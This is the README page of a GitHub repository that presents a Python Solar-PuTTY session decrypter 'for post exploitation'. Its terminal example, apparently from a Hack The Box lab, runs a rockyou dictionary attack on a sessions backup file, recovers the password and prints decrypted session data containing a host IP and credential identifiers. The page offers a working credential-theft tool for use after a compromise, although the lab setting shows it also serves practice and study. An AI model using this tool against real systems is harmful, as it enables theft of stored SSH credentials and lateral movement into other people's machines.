Skip to content

Dimont-Gattsu/SolarPuttyDecrypterPy

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

20 Commits
 
 
 
 
 
 

Repository files navigation

------ Solar Putty Decrypter for Post Exploitation ------

THANK YOU FOR USING!

exploit1.py for basic decryption.

exploit2.py for a dictionary attack:


┌──(kali㉿Kali)-[~/HTB/instant/SolarPuttyDecryptPy]
└─$ python3 decrypt2.py sessions-backup.dat /usr/share/wordlists/rockyou.txt
-----------------------------------------------------
SolarPutty's Sessions Decrypter (Python Version)
-----------------------------------------------------
File content (first 50 bytes): b'ZJlEkpkqLgj2PlzCyLk4gtCfsGO2CMirJoxxdpclYTlEshKzJw'
Trying password: P@ssw0rd!
Potential successful decryption with password: P@ssw0rd!
Decrypted content (first 200 bytes):
b'\xacuY\xff\x11\xfbD\xba\xb3\xe2\xc8\x80pB\xbe\xceU\xed;\x8f)\x10\xb5Ins":[{"Id":"066894ee-635c-4578-86d0-d36d4838115b","Ip":"10.10.11.37","Port":22,"ConnectionType":1,"SessionName":"Instant","Authentication":0,"CredentialsID":"452ed919-530e-419b'

[+] DONE Decrypted file is saved in: SolarPutty_sessions_decrypted_P@ssw0rd!.bin
Continue trying other passwords? (y/n): n

About

Solar Putty Decrypter for Post Exploitation

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages